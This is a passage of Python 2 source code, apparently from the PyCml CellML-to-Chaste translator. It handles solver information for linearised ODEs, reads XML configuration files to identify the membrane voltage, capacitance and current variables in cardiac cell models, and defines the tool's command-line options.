for elt in solver_info.jacobian.math.apply:
yield elt
for entry in solver_info.jacobian.entry:
for elt in entry.math.xml_element_children():
yield elt
# Linearised ODEs - only g & h can be changed
if hasattr(solver_info, u'linear_odes'):
for _, _, eqns in self.get_linearised_odes():
for eqn in eqns:
yield eqn
def get_linearised_odes(self):
"""Return an iterable over the linearised ODEs, i.e. ODEs of the form
du/dt = g + hu (with g, h not functions of u).
Yields tuples (u, t, eqns) where the form of eqns depends on whether
add_linear_ode_update_equations has been called. If so, it is a 1-tuple
containing the update equation; if not, it is (g,h).
"""
if hasattr(self._solver_info, u'linear_odes'):
if hasattr(self._solver_info.linear_odes.math, u'ci'):
for math in self._solver_info.linear_odes.math:
u, t, eqn = list(math.xml_element_children())
u = u.variable
t = t.variable
yield (u, t, (eqn,))
else:
for ode in self._solver_info.linear_odes.math.apply:
u = ode.apply.ci.variable
t = ode.apply.bvar.ci.variable
opers = ode.apply[1].operands()
g = opers.next()
h = opers.next().operands().next()
yield (u, t, (g,h))
def _add_variable_links(self, elt):
"""Recursively link ci elements in the given XML tree to cellml_variable objects.
Also sets component links: for ci elements, to the component containing the linked
variable, and for cn elements, to the first component in the model.
"""
if isinstance(elt, mathml_ci):
var = self._get_variable(unicode(elt))
elt._cml_variable = var
elt._cml_component = var.component
elif isinstance(elt, mathml_cn):
# Fake a component, since it doesn't really have one
elt._cml_component = elt.model.component
elif hasattr(elt, 'xml_children'):
for child in elt.xml_children:
self._add_variable_links(child)
_jac_temp_re = re.compile(r't[0-9]+')
def _get_variable(self, varname):
"""Return the variable in the model with name varname."""
try:
if varname == 'delta_t':
# Special case for the timestep in ComputeJacobian and elsewhere
var = self.get_dt()
elif self._jac_temp_re.match(varname):
var = self._get_special_variable(varname, VarTypes.Unknown)
else:
var = cellml_variable.get_variable_object(self._model, varname)
except KeyError:
raise ValueError("Cannot find variable '%s' referenced in SolverInfo" % varname)
return var
def create_dt(self, modifier, comp, units):
"""Create the special 'dt' variable in the given component."""
self._dt = modifier.add_variable(comp, modifier._uniquify_var_name(u'dt', comp), units)
self._dt._set_type(VarTypes.Free)
return self._dt
def get_dt(self):
"""Get or create a special 'dt' variable."""
if not self._dt:
self._dt = self._get_special_variable(u'dt', VarTypes.Free)
return self._dt
def _get_special_variable(self, varname, ptype=VarTypes.Unknown):
"""Get or create a special variable object that doesn't really exist in the model."""
comp = self._get_special_component()
try:
var = comp.get_variable_by_name(varname)
except KeyError:
var = cellml_variable.create_new(self._model, varname, u'dimensionless')
comp._add_variable(var)
var._set_type(ptype)
return var
def _get_special_component(self):
"""Get or create a special component for containing special variables."""
if not self._component:
self._component = cellml_component.create_new(self._model, u'')
self._model._add_component(self._component, special=True)
return self._component
class ConfigurationStore(object):
"""
A container for configuration information, read in from XML
configuration files. The file structure is described in the
read_configuration_file method.
"""
def __init__(self, doc, options=None):
"""Create a new store.
doc specifies a CellML document, the processing of which this configuration store will affect.
If given, options should be an optparse.Values instance containing command-line options.
"""
self.doc = doc
doc._cml_config = self
self.options = options
self.unit_definitions = cellml_component.create_new(doc.model, '*lookup_table_units*')
self.unit_definitions.xml_parent = doc.model # Needed for looking up standard units
# Transmembrane potential
self.V_definitions = [u'membrane,V']
self.V_variable = None
# Membrane capacitance
self.Cm_definitions = []
self.Cm_variable = None
# Lookup table configuration
self.lut_config = {}
# Ionic currents configuration
self.i_stim_definitions = [u'membrane,i_Stim']
self.i_stim_var = None
self.i_ionic_definitions = [u'membrane,i_.*']
self.i_ionic_vars = []
# Whether GetIIonic will need to negate the sum of i_ionic_vars
self.i_ionic_negated = False
# Whether the stimulus magnitude is positive, rather than negative
self.i_stim_negated = False
# Other variables that may be set by other code, for example an InterfaceGenerator
self.dt_variable = None
self.i_data_clamp_current = None
self.i_data_clamp_conductance = None
return
def read_configuration_file(self, config_file):
"""Read configuration stored in config_file.
The configuration file is expected to be XML, conforming to
the following structure. Currently little checking is done on
the file format; incorrectly formatted files are unlikely to
give particularly helpful error messages.
The root element may contain a 'global' element, giving global
configuration options. These include:
* 'lookup_tables'
Contains one or more 'lookup_table' elements, one for each
type of lookup table available. These contain (a selection of)
the elements:
* 'var' - the variable to key on. The component name given
should be that from which the variable is exported. Must be
present.
* 'min', 'max', 'step' - table bounds parameters. Optional.
Default values are used for parameters that are not present.
* 'currents'
Defines which variables hold the ionic and stimulus currents,
if any. It contains 2 elements:
* 'stimulus' - the full name of the stimulus current variable
* 'ionic_match' - a regular expression matching full names of
ionic current variables. It may also match the stimulus
current, but the stimulus will never be considered an ionic
current. The value is split on ','; the first part is then
matched against component names, and the second against
variables in matching components.
This is mostly redundant now, because the equation for dV/dt
is used first to determine the ionic currents (see documentation
for _find_transmembrane_currents_from_voltage_ode), and only
if this fails to find suitable currents will the ionic_match
definition be used.
* 'transmembrane_potential'
Defines which variable holds the transmembrane potential.
Defaults to 'membrane,V' if not present.
* 'membrane_capacitance'
Defines which variable holds the cell membrane capacitance.
The root element also contains 0 or more 'for_model' elements,
which contain settings for individual models. These must have
at least one of an 'id' or 'name' attribute, which specify the
model in question. They can also contain anything allowable as
global configuration options. Options given here override those
specified globally.
Configuration which is identical for groups of models may be given
using the 'for_models' element. This has an 'ids' element as its
first child, which contains 'id' elements holding either the name
or id of a model. The remaining contents of the 'for_models'
element are as for 'for_model'.
There are 3 ways of specifying variables:
1. By name (var type='name')
Variable names are given in full form, i.e. component_name,variable_name
2. By standardised name (var type='oxmeta')
Use the name from the oxmeta annotations
3. By reference to a section of the config file (when defining lookup table keys)
e.g. <var type='config-name'>transmembrane_potential</var>
Within any element that specifies a variable, a list of <var> elements can be
provided. Each will be tried in turn to see if a match can be found in the model,
and the first match wins.
Some items are overridden if oxmeta annotations are present in the model, with
the annotated variable taking precedence over the config file specification.
"""
DEBUG('config', "Reading configuration from ", config_file)
binder = amara.bindery.binder()
binder.set_binding_class(None, "units", cellml_units)
binder.set_binding_class(None, "unit", cellml_unit)
rules = [bt.ws_strip_element_rule(u'*')]
config_doc = amara_parse(config_file, rules=rules, binderobj=binder)
# Store extra units definitions
for defn in config_doc.xml_xpath(u'/*/units'):
defn.xml_parent = self.unit_definitions # Needed for looking up the units this definition is derived from
self.unit_definitions.add_units(defn.name, defn)
# Overrides for command-line options
if self.options and hasattr(config_doc.pycml_config, 'command_line_args'):
args = map(str, config_doc.pycml_config.command_line_args.arg)
args.append('dummy-file')
get_options(args, self.options)
# Sections to use in configuration; later sections take precedence
sections = []
# Use global configuration?
glo = config_doc.xml_xpath(u'/*/global')
if glo:
sections.append(glo[0])
# Get the config section(s) for our model. Sections
# specifically for this model come after sections covering
# multiple models, so they take precedence.
model_id = getattr(self.doc.model, u'id', self.doc.model.name)
sections.extend(config_doc.xml_xpath(
u'/*/for_models[ids/id="%s" or ids/id="%s"]'
% (self.doc.model.name, model_id)))
sections.extend(config_doc.xml_xpath(
u'/*/for_model[@name="%s" or @id="%s"]'
% (self.doc.model.name, model_id)))
# Main items of configuration
for section in sections:
if hasattr(section, u'lookup_tables'):
self._parse_lookup_tables(section.lookup_tables)
if hasattr(section, u'currents'):
self._parse_currents(section.currents)
if hasattr(section, u'transmembrane_potential'):
self._parse_Vm(section.transmembrane_potential)
if hasattr(section, u'membrane_capacitance'):
self._parse_Cm(section.membrane_capacitance)
def finalize_config(self):
"""Having read all the configuration files, apply to the model."""
# If no LT options given, add defaults
if not self.lut_config:
config_key = ('config-name', 'transmembrane_potential')
self.lut_config[config_key] = {}
self._set_lut_defaults(self.lut_config[config_key])
# Identify the variables in the model
self.find_transmembrane_potential()
self.find_membrane_capacitance()
if not self.options.protocol:
self.find_current_vars()
def _create_var_def(self, content, defn_type):
"""Create a variable definition object."""
xml_fragment = '<var type="%s">%s</var>' % (defn_type, content)
return amara.parse(str(xml_fragment)).var
def _check_var_def(self, var_elt, var_desc):
"""Check a variable definition is syntactically valid.
If type == 'name', it must have text content of the form "component_name,variable_name".
If type == 'oxmeta', it must have text content drawn from METADATA_NAMES.
If type == 'config-name', it must have text content either 'stimulus' or 'transmembrane_potential'.
"""
defn_type = getattr(var_elt, u'type', u'name')
if defn_type == u'name':
name_parts = unicode(var_elt).strip().split(',')
if len(name_parts) != 2:
raise ConfigurationError('Invalid definition of ' + var_desc + ': '
+ unicode(var_elt))
elif defn_type == u'oxmeta':
if unicode(var_elt) not in cellml_metadata.METADATA_NAMES:
raise ConfigurationError('"' + unicode(var_elt) + '" is not a valid oxmeta name')
elif defn_type == u'config-name':
if unicode(var_elt) not in [u'stimulus', u'transmembrane_potential', u'membrane_capacitance']:
raise ConfigurationError('"' + unicode(var_elt) + '" is not a name known to the config file')
else:
raise ConfigurationError('"' + defn_type + '" is not a valid variable definition type')
return
def _parse_var(self, elt, name):
"""Parse definition of a special variable."""
if hasattr(elt, 'var'):
# List of possibilities
defs = []
for vardef in elt.var:
self._check_var_def(vardef, name)
defs.append(vardef)
else:
# Old style - single variable given by text content
self._check_var_def(elt, name)
defs = [elt]
return defs
def _parse_Vm(self, vm_elt):
"""Parse definition of variable holding the transmembrane potential."""
self.V_definitions = self._parse_var(vm_elt, 'transmembrane_potential')
def _parse_Cm(self, cm_elt):
"""Parse definition of variable holding the cell membrane capacitance."""
self.Cm_definitions = self._parse_var(cm_elt, 'membrane_capacitance')
def _parse_currents(self, currents):
"""Parse definitions of ionic and stimulus currents."""
if hasattr(currents, u'stimulus'):
self.i_stim_definitions = self._parse_var(currents.stimulus, 'stimulus current')
if hasattr(currents, u'ionic_match'):
self.i_ionic_definitions = self._parse_var(currents.ionic_match, 'ionic currents')
return
def _find_variable(self, defn, pe_done=False):
"""Find a variable matching the given definition.
If pe_done is True, then partial evaluation has been performed
on the model, so looking for variables by name needs to look for
variables called compname__varname in the single component.
"""
defn_type = getattr(defn, u'type', u'name')
if defn_type == u'name':
name_parts = unicode(defn).strip().split(',')
if pe_done:
try:
var = self.doc.model.component.get_variable_by_name(u'__'.join(name_parts))
except KeyError:
var = None
else:
var = self.doc.model.xml_xpath(u'cml:component[@name="%s"]/cml:variable[@name="%s"]'
% tuple(name_parts))
if var:
var = var[0]
elif defn_type == u'oxmeta':
var = self.doc.model.get_variable_by_oxmeta_name(str(defn), throw=False)
elif defn_type == u'config-name':
if unicode(defn) == u'stimulus':
var = self.i_stim_var
elif unicode(defn) == u'transmembrane_potential':
var = self.V_variable
elif unicode(defn) == u'membrane_capacitance':
var = self.Cm_variable
else:
raise ConfigurationError('"' + str(defn) + '" is not a valid configuration file variable name')
else:
raise ConfigurationError('"' + defn_type + '" is not a valid variable definition type')
return var
def _process_ci_elts(self, elt, func, **kwargs):
"""Recursively apply func to any ci elements in the tree rooted at elt."""
if isinstance(elt, mathml_ci):
func(elt, **kwargs)
else:
for child in getattr(elt, 'xml_children', []):
self._process_ci_elts(child, func, **kwargs)
def _find_transmembrane_currents_from_voltage_ode(self):
"""Analyse the expression for dV/dt to determine the transmembrane currents.
Looks for an equation defining dV/d(something) and assumes the something is
time; this will be checked during code generation for Chaste. It then finds
all variables on the RHS of this equation which have the same units as the
stimulus current (self.i_stim_var) and identifies these as transmembrane
currents. Will automatically exclude the stimulus current.
If self.V_variable is not set, returns the empty list.
"""
if not self.V_variable:
DEBUG('config', "Transmembrane potential not configured, so can't determine currents from its ODE")
return []
if self.i_stim_var:
current_units = [self.i_stim_var.component.get_units_by_name(self.i_stim_var.units)]
else:
current_units = CellMLToChasteTranslator.get_current_units_options(self.doc.model)
ionic_vars = []
def find_units_match(test_units, units_list, remove_match=False, keep_only_match=False):
"""Look for a units definition dimensionally equivalent to test_units within units_list.
If remove_match is True, remove the first match from the list.
If keep_only_match is True, remove all entries except the first match from the list.
Return the matching units, or None if there are no matches.
"""
for units in units_list:
if test_units.dimensionally_equivalent(units):
match = units
break
else:
match = None
if match and remove_match:
units_list.remove(match)
if match and keep_only_match:
units_list[:] = []
units_list.append(match)
return match
def clear_values(expr, process_definitions=False):
"""Recursively clear saved values for variables in this expression.
If process_definitions is True, recursively treat expressions defining variables
used in this expression, too.
"""
def process_var(var):
var.unset_values()
var._unset_binding_time(only_temporary=True)
if process_definitions:
defn = var.get_dependencies()
if defn:
if isinstance(defn[0], mathml_apply):
clear_values(defn[0].eq.rhs, process_definitions=True)
elif isinstance(defn[0], cellml_variable):
process_var(defn[0])
def process_ci(ci_elt):
process_var(ci_elt.variable)
self._process_ci_elts(expr, process_ci)
def check_if_current(ci_elt, vars_found):
"""Check if this is a transmembrane current."""
v = ci_elt.variable
if v.get_source_variable(recurse=True) is not self.i_stim_var:
vars_found.append(v)
# Check units
u = v.component.get_units_by_name(v.units)
if find_units_match(u, current_units, keep_only_match=True):
ionic_vars.append(v.get_source_variable(recurse=True))
ionic_vars[-1]._cml_ref_in_dvdt = ci_elt # Hack for data clamp support (#2708)
# Fake this variable being 1 so we can check the sign of GetIIonic
if not v.is_statically_const(ignore_annotations=True):
v.set_value(1.0)
def bfs(func, vars, *args, **kwargs):
"""Do a breadth first search of the definitions of variables in vars.
func is the recursive function to call. It will be given the list of defining expressions
as its first argument, and args and kwargs as remaining arguments.
"""
def get_defn(var):
defn = var.get_dependencies()
if defn:
var._set_binding_time(BINDING_TIMES.static, temporary=True)
if isinstance(defn[0], cellml_variable):
defn = get_defn(defn[0])
else:
assert isinstance(defn[0], mathml_apply)
var.unset_values()
defn = defn[0].eq.rhs
return defn
defns = []
for var in vars:
defn = get_defn(var)
if defn:
defns.append(defn)
if defns:
func(defns, *args, **kwargs)
def find_currents(exprs, depth=0, maxdepth=2):
"""Find ionic currents by searching the given expressions.
On the initial call, exprs should contain just the definition of dV/dt (i.e. the RHS).
Uses breadth-first search of the equation dependency tree to find variables that
have units dimensionally equivalent to one of the current formulations that Chaste
can handle, or equivalent to the stimulus current's units if one is defined.
Initially, A_per_F is removed from the list, since the RHS of dV/dt should always
have equivalent dimensions. If another option can't be found within maxdepth levels,
we restart the search with A_per_F included. The depth limit is intended to guard against
unexpectedly finding something that isn't a current; it's somewhat dodgy, but won't
break on any model I know, and I haven't thought of a better approach yet.
When one variable with suitable units is found, further ionic currents must have units
equivalent to its to be found. Also once one ionic current is found, only the remaining
expressions at its depth will be processed.
"""
if depth == 0 and maxdepth > 0:
dvdt_units = exprs[0].xml_parent.eq.lhs.get_units()
A_per_F = find_units_match(dvdt_units, current_units, remove_match=True)
# Process all expressions at this depth
vars_found = []
for expr in exprs:
self._process_ci_elts(expr, check_if_current, vars_found=vars_found)
if not ionic_vars and depth != maxdepth:
# Process the definitions of expressions at this depth
bfs(find_currents, vars_found, depth+1, maxdepth)
# If we reached maxdepth unsuccessfully, try again with A_per_F included
if not ionic_vars and depth == 0 and maxdepth > 0:
current_units.append(A_per_F)
find_currents(exprs, depth, maxdepth=-1)
def assign_values_for_stimulus_check(exprs, found_stim=Sentinel()):
"""Assign temporary values to variables in order to check the stimulus sign.
This will process defining expressions in a breadth first search until the stimulus
current is found. Each variable that doesn't have its definitions processed will
be given a value as follows:
- stimulus current = 1
- other currents = 0
- other variables = 1
The stimulus current is then negated from the sign expected by Chaste if evaluating
dV/dt gives a positive value.
"""
assert len(current_units) == 1 # We are using the stimulus units
vars = []
def f(ci_elt):
v = ci_elt.variable
if v.get_source_variable(recurse=True) is self.i_stim_var:
v.set_value(1.0)
found_stim.set()
else:
u = v.component.get_units_by_name(v.units)
if u.dimensionally_equivalent(current_units[0]):
v.set_value(0.0)
elif not v.is_statically_const(ignore_annotations=True):
v.set_value(1.0)
vars.append(v)
for expr in exprs:
self._process_ci_elts(expr, f)
if not found_stim:
bfs(assign_values_for_stimulus_check, vars, found_stim=found_stim)
# Iterate over all expressions in the model, to find the one for dV/d(something)
for expr in (e for e in self.doc.model.get_assignments() if isinstance(e, mathml_apply) and e.is_ode()):
# Assume the independent variable is time; if it isn't, we'll catch this later
(dep_var, time_var) = expr.assigned_variable()
if dep_var.get_source_variable(recurse=True) is self.V_variable:
# Recursively search for ionic currents
find_currents([expr.eq.rhs])
# Check the sign of the RHS
self.i_ionic_negated = expr.eq.rhs.evaluate() > 0.0
clear_values(expr.eq.rhs, process_definitions=True)
if self.i_stim_var:
# Check the sign of the stimulus current
assign_values_for_stimulus_check([expr.eq.rhs])
self.i_stim_negated = expr.eq.rhs.evaluate() > 0.0
clear_values(expr.eq.rhs, process_definitions=True)
# Found dV/d(something); don't check any more expressions
break
DEBUG('config', "Found ionic currents from dV/dt: ", ionic_vars)
call_if(self.i_ionic_negated, DEBUG, 'config', "Ionic current is negated")
call_if(self.i_stim_negated, DEBUG, 'config', "Stimulus current is negated")
return ionic_vars
def _find_var(self, oxmeta_name, definitions):
"""Find the variable object in the model for a particular concept.
Will look for a variable annotated with the given oxmeta_name first, then
try the list of definitions from the configuration file in turn.
"""
var = None
# Prepend an oxmeta definition
oxmeta_defn = self._create_var_def(oxmeta_name, 'oxmeta')
for defn in [oxmeta_defn] + definitions:
var = self._find_variable(defn)
if var:
break
return var
def find_current_vars(self):
"""Find the variables representing currents."""
# Find the stimulus current, if it exists for this kind of model (some are self-excitatory)
if not self.doc.model.is_self_excitatory():
self.i_stim_var = self._find_var('membrane_stimulus_current', self.i_stim_definitions)
DEBUG('config', 'Found stimulus', self.i_stim_var)
if not self.i_stim_var:
# No match :(
msg = "No stimulus current found; you'll have trouble generating Chaste code"
if self.options.fully_automatic:
raise ConfigurationError(msg)
else:
print >>sys.stderr, msg
self.i_stim_var = None
# For other ionic currents, try using the equation for dV/dt unless told otherwise
if not self.options.use_i_ionic_regexp:
self.i_ionic_vars = self._find_transmembrane_currents_from_voltage_ode()
else:
for defn in self.i_ionic_definitions:
if getattr(defn, u'type', u'name') != u'name':
raise ConfigurationError('Ionic current definitions have to have type "name"')
regexps = unicode(defn).strip().split(',')
comp_re = re.compile(regexps[0] + '$')
var_re = re.compile(regexps[1] + '$')
for component in getattr(self.doc.model, u'component', []):
if comp_re.match(unicode(component.name).strip()):
for var in getattr(component, u'variable', []):
if (var is not self.i_stim_var and
var_re.match(unicode(var.name).strip())):
self.i_ionic_vars.append(var)
if not self.i_ionic_vars:
msg = "No ionic currents found; you'll have trouble generating Chaste code"
if self.options.fully_automatic:
raise ConfigurationError(msg)
else:
print >>sys.stderr, msg
return
def _parse_lookup_tables(self, lookup_tables):
"""Parse a lookup_tables element."""
for lt in lookup_tables.lookup_table:
var_type = getattr(lt.var, u'type', u'name')
var_name = unicode(lt.var).strip()
config_key = (var_type, var_name)
if not config_key in self.lut_config:
self.lut_config[config_key] = {}
self._set_lut_defaults(self.lut_config[config_key])
for elt in lt.xml_element_children():
if elt.localName != u'var':
self.lut_config[config_key]['table_' + elt.localName] = unicode(elt).strip()
if hasattr(lt, u'units'):
try:
units = self.unit_definitions.get_units_by_name(lt.units)
except KeyError:
raise ConfigurationError('The units "%s" referenced by the lookup table for "%s" do not exist'
% (lt.units, var_name))
self.lut_config[config_key]['table_units'] = units
return
def _set_lut_defaults(self, lut_dict):
"""Set default configuration for a lookup table."""
def_dict = optimize.LookupTableAnalyser._LT_DEFAULTS
for k, v in def_dict.iteritems():
if k != 'table_var':
lut_dict[k] = v
lut_dict['table_units'] = None
return
def annotate_currents_for_pe(self):
"""Annotate ionic & stimulus current vars so PE doesn't remove them.
Also annotate the membrane capacitance, if defined."""
if self.i_stim_var:
self.i_stim_var.set_pe_keep(True)
for var in self.i_ionic_vars:
var.set_pe_keep(True)
if self.Cm_variable:
self.Cm_variable.set_pe_keep(True)
return
def expose_variables(self):
"""Expose variables for access with GetAnyVariable if desired."""
def annotate(var):
t = var.get_type()
if t == VarTypes.Constant:
var.set_is_modifiable_parameter(True)
elif t in [VarTypes.Computed, VarTypes.Free, VarTypes.Mapped]:
var.set_is_derived_quantity(True)
if self.options.expose_annotated_variables:
for var in self.metadata_vars:
if (not self.options.use_chaste_stimulus or
not var.oxmeta_name in cellml_metadata.STIMULUS_NAMES):
annotate(var)
DEBUG('translate', "+++ Exposed annotated variables")
if self.options.expose_all_variables:
for var in self.doc.model.get_all_variables():
annotate(var)
DEBUG('translate', "+++ Exposed all variables")
def annotate_metadata_for_pe(self):
"Annotate all vars tagged with metadata so PE doesn't remove them."
for var in self.metadata_vars:
var.set_pe_keep(True)
return
def find_transmembrane_potential(self):
"""Find and store the variable object representing V.
Tries metadata annotation first. If that fails, uses the name given in
the command line options, if present. If that fails, uses the config file.
"""
if not self.options:
raise ValueError('No command line options given')
# Check command line option before config file
if self.options.transmembrane_potential:
self.V_definitions[0:0] = [self.options.transmembrane_potential.strip().split(',')]
if len(self.V_definitions[0]) != 2:
raise ConfigurationError('The name of V must contain both component and variable name')
self.V_variable = self._find_var('membrane_voltage', self.V_definitions)
DEBUG('config', 'Found V', self.V_variable)
if not self.V_variable and not self.options.protocol:
raise ConfigurationError('No transmembrane potential found; check your configuration')
return self.V_variable
def find_membrane_capacitance(self):
"""Find and store the variable object representing the cell membrane capacitance.
Uses first metadata, if present, then the configuration file."""
self.Cm_variable = self._find_var('membrane_capacitance', self.Cm_definitions)
DEBUG('config', 'Found capacitance', self.Cm_variable)
def find_lookup_variables(self):
"""Find the variable objects used as lookup table keys.
This method translates the variable names given in the configuration file into objects
in the document, and then uses those objects as keys in our lut_config dictionary.
The ultimate source variable for the variable specified is used, in order to avoid
complications caused by intermediaries being removed (e.g. by PE).
The table settings are also units-converted to match the units of the key variable.
"""
new_config = {}
for key in self.lut_config:
defn_type, content = key
defn = self._create_var_def(content, defn_type)
var = self._find_variable(defn)
if not var:
# Variable doesn't exist, so we can't index on it
LOG('lookup-tables', logging.WARNING, 'Variable', content, 'not found, so not using as table index.')
else:
var = var.get_source_variable(recurse=True)
if not var in new_config:
new_config[var] = {}
new_config[var].update(self.lut_config[key])
# Apply units conversions to the table settings if required
table_units = new_config[var]['table_units']
if table_units:
var_units = var.get_units()
if not table_units.dimensionally_equivalent(var_units):
LOG('lookup-tables', logging.WARNING, 'Variable', content, 'is in units', var_units.description(),
'which are incompatible with', table_units.description(), 'so not using as table index.')
elif not table_units.equals(var_units):
# New setting[var_units] = m[var_units/table_units]*(setting-o1[table_units]) + o2[var_units]
# c.f. mathml_units_mixin._add_units_conversion
print 'LT conversion:', table_units.description(), 'to', var_units.description(), 'equal?', table_units.equals(var_units)
m = table_units.get_multiplicative_factor() / var_units.get_multiplicative_factor()
for setting in new_config[var]:
try:
old_value = float(new_config[var][setting])
new_value = m * (old_value - table_units.get_offset()) + var_units.get_offset()
new_config[var][setting] = unicode(new_value)
print 'LT conversion', setting, old_value, new_value
except (ValueError, TypeError):
pass
self.lut_config = new_config
DEBUG('config', 'Lookup tables configuration:', new_config)
return
# TODO - move into seperate metadata class?
def validate_metadata(self, assume_valid=False):
"""Check that the metadata annotations are 'sensible'.
Ensures that only names we know are used, and that the same name isn't used for multiple variables.
"""
vars = cellml_metadata.find_variables(self.doc.model, ('bqbiol:is', NSS['bqbiol']))
self.metadata_vars = filter(lambda v: v.oxmeta_name, vars)
if assume_valid:
return
names_used = [var.oxmeta_name for var in self.metadata_vars]
DEBUG('metadata', 'Names found: ', names_used)
# Check all metadata is allowed
unknown_names = frozenset(names_used) - cellml_metadata.METADATA_NAMES
if unknown_names:
msg = ['Unrecognised oxmeta variable names found (run with --assume-valid to ignore):']
msg.extend(sorted(unknown_names))
raise ConfigurationError('\n '.join(msg))
# Check for duplicates
d = {}
for name in names_used:
if name in d:
raise ConfigurationError(name + ' metadata attribute is duplicated in the cellml file.')
else:
d[name] = name
######################################################################
# For running as an executable #
######################################################################
def get_options(args, default_options=None):
"""get_options(args):
Process our command-line options.
args is a list of options & positional arguments.
default_options, if given, is an instance of optparse.Values created by a
previous call to this function.
"""
usage = 'usage: %prog [options] <cellml file or URI>'
parser = optparse.OptionParser(version="%%prog %s" % __version__,
usage=usage)
parser.add_option('-q', '--quiet', action='store_true', default=False,
help="don't show warning messages, only errors")
# What type of translation is being performed
parser.add_option('-T', '--translate',
dest='translate', action='store_true',
default=True,
help="output computer code [default]")
parser.add_option('-C', '--output-cellml',
dest='translate', action='store_false',
help="output an annotated CellML file instead of translating, on stdout unless -o specified")
translators = sorted(CellMLTranslator.translators)
parser.add_option('-t', '--translate-type',
type='choice', choices=translators,
default='Chaste', metavar='TYPE',
help="the type of code to output [default: %default]. "
"Choices: " + str(translators))
parser.add_option('-o', dest='outfilename', metavar='OUTFILE',
help="write program code to OUTFILE [default action is to use the input filename with a different extension]")
# Global adjustment settings
parser.add_option('--config-file',
action='append', default=[],
help="pathname of configuration file")
parser.add_option('-A', '--fully-automatic',
action='store_true', default=False,
help="if human intervention is required, fail noisily")
parser.add_option('--assume-valid',
action='store_true', default=False,
help="skip some of the model validation checks")
parser.add_option('--warn-on-unit-conversions',
action='store_true', default=False,
help="generate a warning if unit conversions are required")
parser.add_option('--Wu', '--warn-on-units-errors',
action='store_true', default=False,
dest='warn_on_units_errors',
help="give a warning instead of an error for dimensional inconsistencies")
parser.add_option('-V', '--transmembrane-potential', default=None, metavar='POT_VAR',
help="POT_VAR is the full name of the variable representing the transmembrane potential."
" If not specified here, the configuration file will be used, which is the prefered method."
" Defaults to 'membrane,V'.")
parser.add_option('-d', '--debug', action='store_true', default=False,
help="output debug info to stderr")
parser.add_option('-D', '--debug-source', action='append',
help="only show debug info from the specified part of the code."
" This option may appear more than once to select multiple sources. Implies -d.")
parser.add_option('--profile', action='store_true', default=False,
help="turn on profiling of PyCml")
# To examine the profile do something like:
# import os,pstats
# os.chdir('/tmp')
# files = filter(lambda f: f.startswith('pycml'), os.listdir('.'))
# p = pstats.Stats(*files)
# p.strip_dirs().sort_stats('cum').print_stats(15)
# What optimisations/transformations to do
group = optparse.OptionGroup(parser, 'Transformations',
"These options control which transformations (typically optimisations) are applied in the generated code")
group.add_option('-l', '--lookup-tables',
dest='lut', action='store_true', default=False,
help="perform a lookup table analysis")
group.add_option('-p', '--pe', '--partial-evaluation',
dest='pe', action='store_true', default=False,
help="partially evaluate the model")
group.add_option('-u', '--units-conversions',
action='store_true', default=False,
help="add explicit units conversion mathematics")
group.add_option('-j', '--maple-output',
metavar='FILENAME', default=None,
help="file containing output from a Maple script generated using -J. The generated"
" code/CellML will then contain a symbolic Jacobian as computed by Maple.")
group.add_option('-J', '--do-jacobian-analysis',
action='store_true', default=False,
help="generate code to perform Jacobian analysis for backward Euler & CVODE; implies -t Maple")
group.add_option('--backward-euler',
action='store_true', default=False,
help="generate a specialised cell model that solves itself using a decoupled"
" backward Euler method. Not compatible with --rush-larsen. Implies -t Chaste."
" Requires -j.")
group.add_option('--rush-larsen',
action='store_true', default=False,
help="use the Rush-Larsen method to solve Hodgkin-Huxley style gating variable"
" equations. Not compatible with --backward-euler. Implies -t Chaste.")
group.add_option('--grl1',
action='store_true', default=False,
help="use the GRL1 method to solve Hodgkin-Huxley style gating variable"
" equations. Not compatible with the backward Euler transformation."
" Implies -t Chaste.")
group.add_option('--grl2',
action='store_true', default=False,
help="use the GRL2 method to solve Hodgkin-Huxley style gating variable"
" equations. Not compatible with the backward Euler transformation."
" Implies -t Chaste.")
parser.add_option_group(group)
# Settings tweaking the generated code
group = optparse.OptionGroup(parser, 'Generated code options')
group.add_option('-c', '--class-name', default=None,
help="explicitly set the name of the generated class")
group.add_option('-a', '--augment-class-name',
dest='augment_class_name', action='store_true',
default=False,
help="alter the class name to show what transformations are used")
group.add_option('--no-timestamp',
action='store_true', default=False,
help="don't add a timestamp comment to generated files")
parser.add_option_group(group)
# Options specific to Maple output
group = optparse.OptionGroup(parser, 'Maple options', "Options specific to Maple code output")
group.add_option('--dont-omit-constants',
dest='omit_constants', action='store_false', default=True,
help="when generating Maple code, include assignments of constants")
group.add_option('--compute-partial-jacobian', dest='compute_full_jacobian',
action='store_false', default=True,
help="make generated Maple code compute a Jacobian specific to a Newton solve"
" of the nonlinear portion of the ODE system, rather than the full system Jacobian")
parser.add_option_group(group)
# Options specific to Python output
group = optparse.OptionGroup(parser, 'Python options', "Options specific to Python code output")
group.add_option('--no-numba', dest='numba', default=True, action='store_false',
help="turn off using Numba to optimise code on-the-fly")
parser.add_option_group(group)
# Options specific to Chaste output
group = optparse.OptionGroup(parser, 'Chaste options', "Options specific to Chaste code output")
group.add_option('-y', '--dll', '--dynamically-loadable',
dest='dynamically_loadable',
action='store_true', default=False,
help="add code to allow the model to be compiled to a shared library and dynamically loaded"
" (only works if -t Chaste is used)")
group.add_option('--use-chaste-stimulus',
action='store_true', default=False,
help="when generating Chaste code, use Chaste's stimulus rather than that defined in the model")
group.add_option('--no-use-chaste-stimulus', dest='use_chaste_stimulus',
action='store_false',
help="when generating Chaste code, use the model's stimulus, not Chaste's")
group.add_option('-i', '--convert-interfaces',
action='store_true', default=False,
help="perform units conversions at interfaces to Chaste (only works if -t Chaste is used)")
group.add_option('--use-i-ionic-regexp', dest='use_i_ionic_regexp',
action='store_true', default=False,
help="determine ionic currents from the regexp specified in the config file"
" rather than analysing the voltage derivative equation")
group.add_option('--include-dt-in-tables',
action='store_true', default=False,
help="[experimental] allow timestep to be included in lookup tables. By default"
" uses the timestep of the first cell created. Requires support from external"
" code if timestep changes. Only really useful for backward Euler cells.")
group.add_option('-m', '--use-modifiers',
action='store_true', default=False,
help="[experimental] add modifier functions for certain"
" metadata-annotated variables for use in sensitivity analysis (only works if -t Chaste is used)")
group.add_option('--use-data-clamp',
action='store_true', default=False,
help="[experimental] generate a data clamp subclass of CVODE cells"
" which contains data clamp currents for fitting experimental data (only works if -t CVODE is used)")
group.add_option('--expose-annotated-variables',
action='store_true', default=False,
help="expose all oxmeta-annotated variables for access via the GetAnyVariable functionality")
group.add_option('--expose-all-variables',
action='store_true', default=False,
help="expose all variables for access via the GetAnyVariable functionality")
parser.add_option_group(group)
# Options specific to Functional Curation
